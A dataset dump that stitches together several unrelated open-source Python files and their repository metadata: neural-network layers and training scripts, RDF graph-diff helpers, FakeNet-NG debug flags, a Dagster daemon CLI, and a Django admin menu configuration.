# only works for odd filter size, but the even filter size case is probably not worth supporting.
self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)
else:
raise RuntimeError("Unsupported border_mode for Conv2DMMLayer: %s" % border_mode)
else:
self.pad = pad
self.W = self.create_param(W, self.get_W_shape())
if b is None:
self.b = None
elif self.untie_biases:
output_shape = self.get_output_shape()
self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))
else:
self.b = self.create_param(b, (num_filters,))
self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)
def get_W_shape(self):
num_input_channels = self.input_layer.get_output_shape()[1]
return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])
def get_params(self):
return [self.W] + self.get_bias_params()
def get_bias_params(self):
return [self.b] if self.b is not None else []
def get_output_shape_for(self, input_shape):
batch_size = input_shape[0]
input_width, input_height = input_shape[2:4]
output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1
output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1
return (batch_size, self.num_filters, output_width, output_height)
def get_output_for(self, input, *args, **kwargs):
filters = self.W
if self.flip_filters:
filters = filters[:, :, ::-1, ::-1] # flip width, height
contiguous_filters = gpu_contiguous(filters)
contiguous_input = gpu_contiguous(input)
conved = self.corr_mm_op(contiguous_input, contiguous_filters)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1, 2)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
return self.nonlinearity(activation)
| 37.931373
| 135
| 0.632205
| 517
| 3,869
| 4.535783
| 0.235977
| 0.055437
| 0.053731
| 0.025586
| 0.142431
| 0.093817
| 0.093817
| 0.026439
| 0
| 0
| 0
| 0.015498
| 0.266219
| 3,869
| 101
| 136
| 38.306931
| 0.810497
| 0.065392
| 0
| 0.12
| 0
| 0.013333
| 0.045228
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0.013333
| 0.106667
| 0.026667
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8696b91ed345a9efbc515a25e28bfe35f30846c8
| 3,831
|
py
|
Python
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | 3
|
2015-12-24T15:18:46.000Z
|
2022-02-09T06:56:40.000Z
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | 1
|
2016-10-10T17:26:05.000Z
|
2016-10-10T17:26:05.000Z
|
ldtools/helpers.py
|
dmr/Ldtools
|
9cc5474404a07bd4b7ad756d31306dfc37a39c7b
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
try:
unicode
except NameError:
basestring = unicode = str # Python 3
import logging
import rdflib
from rdflib import compare
logger = logging.getLogger("ldtools")
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
# The background is set with 40 plus the number of the color, and
# the foreground with 30
# These are the sequences need to get colored ouput
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
COL = {
'DEBUG': BLUE, 'INFO': MAGENTA,
'WARNING': YELLOW, 'CRITICAL': YELLOW, 'ERROR': RED}
def set_colored_logger(verbosity_level):
class ColoredFormatter(logging.Formatter):
def format(self, record):
if record.levelname in COL:
record.levelname = COLOR_SEQ % (
30 + COL[record.levelname]) + record.levelname + RESET_SEQ
record.msg = unicode(record.msg)
record.msg = COLOR_SEQ % (30 + GREEN) + record.msg + RESET_SEQ
return logging.Formatter.format(self, record)
formatter = ColoredFormatter("%(asctime)s %(name)s %(funcName)s:%(lineno)d"
" %(levelname)s: %(message)s")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(handler)
logger2 = logging.getLogger("ldtools._add_property")
logger2.setLevel(logging.INFO)
mapper = {1: logging.DEBUG,
2: logging.INFO,
3: logging.WARNING,
4: logging.ERROR,
5: None}
try:
log_level = mapper[verbosity_level]
except KeyError:
log_level = mapper[2]
if log_level:
logger.setLevel(log_level)
return logger
def my_graph_diff(graph1, graph2):
"""Compares graph2 to graph1 and highlights everything that changed.
Colored if pygments available"""
# quick fix for wrong type
if not type(graph1) == type(graph2) == rdflib.Graph:
if type(graph1) == rdflib.ConjunctiveGraph:
g1contexts = list(graph1.contexts())
assert len(g1contexts) == 1
graph1 = g1contexts[0]
if type(graph2) == rdflib.ConjunctiveGraph:
g2contexts = list(graph2.contexts())
assert len(g2contexts) == 1
graph2 = g2contexts[0]
# Return if both graphs are isomorphic
iso1 = compare.to_isomorphic(graph1)
iso2 = compare.to_isomorphic(graph2)
if graph1.identifier == graph2.identifier:
str_bit = u"The 2 '%s' Graphs" % graph1.identifier
else:
str_bit = (u"Graphs '%s' and '%s'"
% (graph1.identifier, graph2.identifier))
if iso1 == iso2:
logger.debug(u"%s are isomorphic" % str_bit)
return
print(u"Differences between %s." % str_bit)
in_both, in_first, in_second = compare.graph_diff(iso1, iso2)
def dump_nt_sorted(g):
return sorted(g.serialize(format='nt').splitlines())
sorted_first = dump_nt_sorted(in_first)
sorted_second = dump_nt_sorted(in_second)
import difflib
diff = difflib.unified_diff(
sorted_first,
sorted_second,
u'Original',
u'Current',
lineterm=''
)
try:
from pygments import highlight
from pygments.formatters import terminal
from pygments.lexers import web
lexer = web.XmlLexer()
formatter = terminal.TerminalFormatter()
print(highlight(u'\n'.join(diff), lexer, formatter))
except ImportError:
logger.info("Install pygments for colored diffs")
print(u'\n'.join(diff))
except UnicodeDecodeError:
print(u"Only in first", unicode(sorted_first))
print(u"Only in second", unicode(sorted_second))
| 30.895161
| 79
| 0.631689
| 453
| 3,831
| 5.231788
| 0.370861
| 0.025316
| 0.01519
| 0.027004
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023683
| 0.261551
| 3,831
| 123
| 80
| 31.146341
| 0.814069
| 0.085095
| 0
| 0.032609
| 0
| 0
| 0.089137
| 0.012611
| 0
| 0
| 0
| 0
| 0.021739
| 1
| 0.043478
| false
| 0
| 0.097826
| 0.01087
| 0.195652
| 0.065217
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8696be28bebb97248ddd7aa9ff8ffc4d35ce9393
| 1,420
|
py
|
Python
|
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
fakenet/diverters/debuglevels.py
|
AzzOnFire/flare-fakenet-ng
|
bafd7e97b61cd43190dee7f1d2c3f4388488af76
|
[
"Apache-2.0"
] | null | null | null |
# Debug print levels for fine-grained debug trace output control
DNFQUEUE = (1 << 0) # netfilterqueue
DGENPKT = (1 << 1) # Generic packet handling
DGENPKTV = (1 << 2) # Generic packet handling with TCP analysis
DCB = (1 << 3) # Packet handlign callbacks
DPROCFS = (1 << 4) # procfs
DIPTBLS = (1 << 5) # iptables
DNONLOC = (1 << 6) # Nonlocal-destined datagrams
DDPF = (1 << 7) # DPF (Dynamic Port Forwarding)
DDPFV = (1 << 8) # DPF (Dynamic Port Forwarding) Verbose
DIPNAT = (1 << 9) # IP redirection for nonlocal-destined datagrams
DMANGLE = (1 << 10) # Packet mangling
DPCAP = (1 << 11) # Pcap write logic
DIGN = (1 << 12) # Packet redirect ignore conditions
DFTP = (1 << 13) # FTP checks
DMISC = (1 << 27) # Miscellaneous
DCOMP = 0x0fffffff # Component mask
DFLAG = 0xf0000000 # Flag mask
DEVERY = 0x0fffffff # Log everything, low verbosity
DEVERY2 = 0x8fffffff # Log everything, complete verbosity
DLABELS = {
DNFQUEUE: 'NFQUEUE',
DGENPKT: 'GENPKT',
DGENPKTV: 'GENPKTV',
DCB: 'CB',
DPROCFS: 'PROCFS',
DIPTBLS: 'IPTABLES',
DNONLOC: 'NONLOC',
DDPF: 'DPF',
DDPFV: 'DPFV',
DIPNAT: 'IPNAT',
DMANGLE: 'MANGLE',
DPCAP: 'PCAP',
DIGN: 'IGN',
DFTP: 'FTP',
DIGN | DFTP: 'IGN-FTP',
DMISC: 'MISC',
}
DLABELS_INV = {v.upper(): k for k, v in DLABELS.items()}
| 33.023256
| 72
| 0.592958
| 166
| 1,420
| 5.066265
| 0.614458
| 0.030916
| 0.049941
| 0.057075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048544
| 0.274648
| 1,420
| 42
| 73
| 33.809524
| 0.767961
| 0.359155
| 0
| 0
| 0
| 0
| 0.091114
| 0
| 0
| 0
| 0.044994
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869714958dec93fb87488625f1ab7000485c9fb2
| 3,175
|
py
|
Python
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 65
|
2017-08-04T03:36:56.000Z
|
2022-03-10T07:25:17.000Z
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 7
|
2017-10-10T02:34:08.000Z
|
2019-09-27T08:59:27.000Z
|
multichannel_lstm/train.py
|
zhr1201/Multi-channel-speech-extraction-using-DNN
|
4e48869e02b815a8b094acc9251ac6586fda350c
|
[
"MIT"
] | 39
|
2017-08-02T04:27:37.000Z
|
2021-11-03T06:43:25.000Z
|
'''
Script for training the model
'''
import tensorflow as tf
import numpy as np
from input import BatchGenerator
from model import MultiRnn
import time
from datetime import datetime
import os
import matplotlib as mpl
mpl.use('Agg')
from matplotlib import pyplot as plt
sum_dir = 'sum' # dir to write summary
train_dir = 'ckpt' # dir to store the model
data_dir = 'train.pkl' # dir of the data set
NEFF = 129 # effective FFT points
batch_size = 128
num_steps = 20
epochs = 2000
cell_type = 'NL_LSTM'
state_size = 256
output_size = 129
num_layer = 3
learning_rate = 0.0001
# build the model
rnn_model = MultiRnn(
cell_type, state_size, output_size,
batch_size, num_layer, learning_rate, num_steps)
# input data and referene data placeholder
in_data = tf.placeholder(
tf.float32, [batch_size, num_steps, 2 * NEFF])
ref_data = tf.placeholder(
tf.float32, [batch_size, num_steps, NEFF])
# make inference
init_state, final_state, inf_data = rnn_model.inference(in_data)
# compute loss
loss = rnn_model.loss(inf_data, ref_data)
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.merge_all_summaries()
train_op = rnn_model.train(loss)
batch_gen = BatchGenerator(data_dir, batch_size, num_steps, epochs)
with tf.Session() as sess:
summary_writer = tf.train.SummaryWriter(
sum_dir, sess.graph)
sess.run(tf.initialize_all_variables())
steps = 0
# generator for epoch data
for idx, epoch in enumerate(batch_gen.gen_epochs()):
training_state = None
# generator for batch data
for f_data, b_data, r_data, v_data in epoch:
start_time = time.time()
steps += 1
in_data_np = np.concatenate((f_data, b_data), axis=2)
if steps % 100 == 0:
feed_dict = {in_data: in_data_np, ref_data: r_data}
if training_state is not None:
feed_dict[init_state] = training_state
# training the net
loss_value, training_state, _, summary_str, test_inf = sess.run(
[loss, final_state, train_op, summary_op, inf_data], feed_dict)
duration = time.time() - start_time
sec_per_batch = float(duration)
examples_per_sec = batch_size / duration
format_str = (
'%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch, epoch %d)')
print (format_str % (datetime.now(), steps, loss_value,
examples_per_sec, sec_per_batch,
idx))
summary_writer.add_summary(summary_str, steps)
else:
feed_dict = {in_data: in_data_np, ref_data: r_data}
if training_state is not None:
feed_dict[init_state] = training_state
loss_value, training_state, _ = sess.run(
[loss, final_state, train_op], feed_dict)
if steps % 10000 == 0:
checkpoint_path = os.path.join(train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=steps)
| 33.776596
| 83
| 0.624252
| 429
| 3,175
| 4.351981
| 0.321678
| 0.022496
| 0.02571
| 0.027317
| 0.170327
| 0.170327
| 0.170327
| 0.140332
| 0.140332
| 0.094269
| 0
| 0.019947
| 0.289449
| 3,175
| 93
| 84
| 34.139785
| 0.807624
| 0.084094
| 0
| 0.084507
| 0
| 0
| 0.036678
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.126761
| 0
| 0.126761
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8697573e23a0bff4599f9e6ef4bcf4db3b6b315f
| 4,002
|
py
|
Python
|
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster/daemon/cli/__init__.py
|
elsenorbw/dagster
|
b38822d7463812624dab0b2dae7c62e2a8d59828
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import threading
import time
import warnings
from contextlib import ExitStack
import click
import pendulum
from dagster import __version__
from dagster.core.instance import DagsterInstance
from dagster.daemon.controller import (
DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
DagsterDaemonController,
all_daemons_healthy,
all_daemons_live,
daemon_controller_from_instance,
debug_daemon_heartbeats,
get_daemon_status,
)
from dagster.utils.interrupts import capture_interrupts, raise_interrupts_as
def _get_heartbeat_tolerance():
tolerance = os.getenv(
"DAGSTER_DAEMON_HEARTBEAT_TOLERANCE",
)
return int(tolerance) if tolerance else DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS
@click.command(
name="run",
help="Run any daemons configured on the DagsterInstance.",
)
def run_command():
with capture_interrupts():
with DagsterInstance.get() as instance:
if instance.is_ephemeral:
raise Exception(
"dagster-daemon can't run using an in-memory instance. Make sure "
"the DAGSTER_HOME environment variable has been set correctly and that "
"you have created a dagster.yaml file there."
)
with daemon_controller_from_instance(
instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()
) as controller:
controller.check_daemon_loop()
@click.command(
name="health-check",
help="DEPRECATED, use liveness-check instead",
)
def health_check_command():
warnings.warn("health-check is deprecated. Use liveness-check instead.")
with DagsterInstance.get() as instance:
if all_daemons_healthy(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()):
click.echo("Daemon healthy")
else:
click.echo("Daemon not healthy")
sys.exit(1)
@click.command(
name="liveness-check",
help="Check for recent heartbeats from the daemon.",
)
@click.option(
"--heartbeat-tolerance",
required=False,
default=DEFAULT_DAEMON_HEARTBEAT_TOLERANCE_SECONDS,
help="How long (in seconds) to allow a daemon to go without heartbeating before failing the dagster-daemon process.",
)
def liveness_check_command():
with DagsterInstance.get() as instance:
if all_daemons_live(instance, heartbeat_tolerance_seconds=_get_heartbeat_tolerance()):
click.echo("Daemon live")
else:
click.echo("Daemon(s) not running")
sys.exit(1)
@click.command(
name="wipe",
help="Wipe all heartbeats from storage.",
)
def wipe_command():
with DagsterInstance.get() as instance:
instance.wipe_daemon_heartbeats()
click.echo("Daemon heartbeats wiped")
@click.command(
name="heartbeat",
help="Read and write a heartbeat",
)
def debug_heartbeat_command():
with DagsterInstance.get() as instance:
debug_daemon_heartbeats(instance)
@click.command(
name="heartbeat-dump",
help="Log all heartbeat statuses",
)
def debug_heartbeat_dump_command():
with DagsterInstance.get() as instance:
for daemon_type in instance.get_required_daemon_types():
click.echo(get_daemon_status(instance, daemon_type))
@click.group(
commands={"heartbeat": debug_heartbeat_command, "heartbeat-dump": debug_heartbeat_dump_command}
)
def debug_group():
"Daemon debugging utils"
def create_dagster_daemon_cli():
commands = {
"run": run_command,
"health-check": health_check_command,
"liveness-check": liveness_check_command,
"wipe": wipe_command,
"debug": debug_group,
}
@click.group(commands=commands)
@click.version_option(version=__version__)
def group():
"CLI tools for working with the dagster daemon process."
return group
cli = create_dagster_daemon_cli()
def main():
cli(obj={}) # pylint:disable=E1123
| 28.183099
| 121
| 0.696902
| 462
| 4,002
| 5.800866
| 0.279221
| 0.080597
| 0.05597
| 0.053731
| 0.248507
| 0.181343
| 0.104478
| 0.084328
| 0.051493
| 0.051493
| 0
| 0.00191
| 0.215142
| 4,002
| 141
| 122
| 28.382979
| 0.851321
| 0.024738
| 0
| 0.13913
| 0
| 0.008696
| 0.224372
| 0.013819
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095652
| false
| 0
| 0.104348
| 0
| 0.217391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
869758494ec4227a029bca8c4e214109b3aea62a
| 331
|
py
|
Python
|
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | 1
|
2020-03-08T20:17:39.000Z
|
2020-03-08T20:17:39.000Z
|
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | null | null | null |
tests/exhaustive/nfl_tests.py
|
atklaus/sportsreference
|
22a45ea83ce1608c3176f00d4f414d5b9463605c
|
[
"MIT"
] | null | null | null |
import sys, os
sys.path.append(os.path.dirname(os.path.dirname(sys.path[0])))
from sportsreference.nfl.teams import Teams
for team in Teams():
print(team.name)
for player in team.roster.players:
print(player.name)
for game in team.schedule:
print(game.dataframe)
print(game.dataframe_extended)
| 27.583333
| 62
| 0.700906
| 49
| 331
| 4.714286
| 0.469388
| 0.060606
| 0.112554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003704
| 0.18429
| 331
| 11
| 63
| 30.090909
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0.4
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86979f732a31535e5210a87577515eada4d424aa
| 1,116
|
py
|
Python
|
rust-old/python/examples/map_fields.py
|
SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | 3
|
2021-03-01T15:35:49.000Z
|
2021-04-04T17:24:48.000Z
|
rust-old/python/examples/map_fields.py
|
SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | null | null | null |
rust-old/python/examples/map_fields.py
|
SerebryakovMA/quelea
|
4bac70d60852a454ad6533d08a02e018c75dc377
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import sys
sys.path.append("../")
from quelea import *
nx = 217
ny = 133
x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas
xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)
# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))
ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave
ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)
# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))
ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()
plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)
plt.savefig("map_fields.pdf")
| 21.882353
| 76
| 0.641577
| 200
| 1,116
| 3.565
| 0.405
| 0.039271
| 0.092567
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.049945
| 0.192652
| 1,116
| 50
| 77
| 22.32
| 0.741398
| 0.189068
| 0
| 0
| 0
| 0
| 0.03132
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.135135
| 0
| 0.135135
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86981ef4c2dc9e662bd6493203efcef25a7c5284
| 4,709
|
py
|
Python
|
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | 10
|
2021-06-23T09:42:30.000Z
|
2022-03-31T22:26:17.000Z
|
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | null | null | null |
test.py
|
t-kaichi/hyperspoof
|
6effdf03be8489ba74154a12416c69948681aa51
|
[
"MIT"
] | null | null | null |
import os
from absl import app
from absl import flags
import numpy as np
import tqdm
from tensorflow.keras import Model
from albumentations import (
Compose, HorizontalFlip, RandomBrightness,RandomContrast,
ShiftScaleRotate, ToFloat, VerticalFlip)
from utils import reset_tf
from eval_utils import calc_score_variance
from models import build_seg_model, build_pixel_mlp_class_model
from VegetableSequence import VegetableDataset, VegetableSequence
from temporal_random_seed import TemporalRandomSeed
import myFlags
FLAGS = flags.FLAGS
def main(argv):
reset_tf(FLAGS.device)
ds_info = VegetableDataset(FLAGS.data_path)
dim = ds_info.hsi_dims
cats = ds_info.get_categories()
# spoof file path
assert FLAGS.spoof_type == "print" or FLAGS.spoof_type == "replay"
spooffn = "224_224.m.rf.npy"
spoofdir = '03' if FLAGS.spoof_type == 'print' else '04' # "04": replay
spooffns = [os.path.join(ds_info.DATASET_ROOT_PATH, str(i).zfill(2),
"05", spoofdir, spooffn) for i in cats]
# dataset generation
input_shape = (224, 224, dim)
AUGMENTATIONS_ALL = Compose([
HorizontalFlip(p=0.5),
VerticalFlip(p=0.2),
RandomContrast(limit=0.001, p=0.5),
RandomBrightness(limit=0.001, p=0.5),
ShiftScaleRotate(
shift_limit=0.3, scale_limit=0.9,
rotate_limit=30, border_mode=4, p=0.8),# cv2.BORDER_REFLECT_101
ToFloat(max_value=1024)
])
AUGMENTATIONS_SIMPLE = Compose([
ToFloat(max_value=1024)
])
test_aug_gen = VegetableSequence(dataset=ds_info, instance_ids=[5],
sample_ids=[1,2], random_state=2, batch_size=32,
augmentations=AUGMENTATIONS_ALL, isTest=True)
# build and load models
print("building model")
nb_classes = ds_info.object_categories
seg_model = build_seg_model(input_shape=input_shape)
seg_model.load_weights(FLAGS.seg_model)
pix_class_model = build_pixel_mlp_class_model(
nb_classes=nb_classes, input_shape=(1,dim))
pix_class_model.load_weights(FLAGS.class_model)
penultimate_feat_extractor = Model(inputs=pix_class_model.input,
outputs=pix_class_model.get_layer("penultimate").output)
def predict_pixel_merge(xs):
_xs_seg = np.argmax(seg_model.predict(xs), axis=-1)
assert len(_xs_seg) == len(xs)
_var_fs = [] # variance of the penultimate features
for i in range(len(xs)):
_x = xs[i]
_x_seg = _xs_seg[i]
_x_pixels = _x[_x_seg > 0]
_x_pixels = _x_pixels[:, np.newaxis, :]
_f_pixels = penultimate_feat_extractor.predict(_x_pixels,
batch_size=224*224*dim).reshape(-1, FLAGS.penultimate_nodes)
_var_f = np.sum(np.var(_f_pixels, axis=0))
_var_fs.append(_var_f)
return _var_fs
predict_func = predict_pixel_merge
var_fs = []
true_labels = []
# process live images
for i in tqdm.trange(FLAGS.live_augs, desc="live augumentations"):
for batch in tqdm.tqdm(test_aug_gen, desc="live augumentations batch"):
xs, ys = batch
var_f = predict_func(xs)
var_fs.extend(var_f)
true_labels.extend(np.argmax(ys, axis=1))
# process spoof images
with TemporalRandomSeed(2021):
for fn in tqdm.tqdm(spooffns, desc="spoofs"):
x = np.load(fn).astype("uint16")
xs_aug = np.array([AUGMENTATIONS_ALL(image=x)["image"]
for i in range(FLAGS.spoof_augs)])
var_f = predict_func(xs_aug)
var_fs.extend(var_f)
true_labels.extend([10000] * FLAGS.spoof_augs) # spoof label: 10000
# calculate accuracy
true_labels = np.array(true_labels)
var_fs = np.array(var_fs)
bin_labels, uncertainties, results = calc_score_variance(true_labels, var_fs)
# save results
expr_name = parentdirname(FLAGS.class_model)
save_result_cache(expr_name, bin_labels, uncertainties, results)
return 0
def save_result_cache(expr_name, labels, uncertainties, results):
dn = os.path.join(FLAGS.out_path, expr_name)
os.makedirs(dn, exist_ok=True)
np.save(os.path.join(dn, "binary_labels.npy"), labels)
np.save(os.path.join(dn, "uncertainties.npy"), uncertainties)
with open(os.path.join(dn, "results.txt"), "w") as f:
for i, result in enumerate(["TNR95: ", "Detection acc.: ", "ROC: "]):
f.write(result + str(results[i]) + "\n")
print("saved to " + dn)
def parentdirname(path):
return os.path.basename(os.path.dirname(path))
if __name__ == "__main__":
app.run(main)
| 36.503876
| 84
| 0.660437
| 641
| 4,709
| 4.586583
| 0.330733
| 0.015306
| 0.017007
| 0.012245
| 0.087755
| 0.060544
| 0.021088
| 0.021088
| 0
| 0
| 0
| 0.026272
| 0.232109
| 4,709
| 129
| 85
| 36.503876
| 0.786781
| 0.046931
| 0
| 0.058824
| 0
| 0
| 0.04847
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 1
| 0.039216
| false
| 0
| 0.127451
| 0.009804
| 0.196078
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8698961278b2541aa172b54c8053ea36ceff0d54
| 4,612
|
py
|
Python
|
generator/apps.py
|
TheJacksonLaboratory/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | 2
|
2020-10-19T17:21:09.000Z
|
2020-10-20T14:27:25.000Z
|
generator/apps.py
|
cometsong/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | null | null | null |
generator/apps.py
|
cometsong/jaxid_generator
|
be5222d9c5ce57a169b94b0afd1ae9f7f10a66c1
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem
APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL
class SuitConfig(DjangoSuitConfig):
name = 'suit'
verbose_name = 'Mbiome Core JAXid Generator'
site_title = 'Mbiome Core JAXid Tracking'
site_header = site_title
index_title = verbose_name
layout = 'vertical'
list_per_page = 35
# header_date_format = 'l, d-M-o'
# header_time_format = 'H:i e'
menu = (
ParentItem('JAX Id Record Lists',
use_first_child_url=True,
url='',
children=[
ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
ChildItem(model='id_generate.boxid'),
ChildItem(model='id_generate.plateid'),
],
icon='fa fa-list-ul'),
ParentItem('Reference Data',
use_first_child_url=True,
url='',
children=[
ChildItem(model='id_generate.projectcode'),
ChildItem(model='id_generate.nucleicacidtype'),
ChildItem(model='id_generate.sampletype'),
ChildItem(model='id_generate.sequencingtype'),
],
icon='fa fa-list'),
ParentItem(
label='Generate new JAXid''s',
url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
permissions='id_generate.change_jaxiddetail',
icon='fa fa-rocket'),
ParentItem(
label='Generate new Box ID''s',
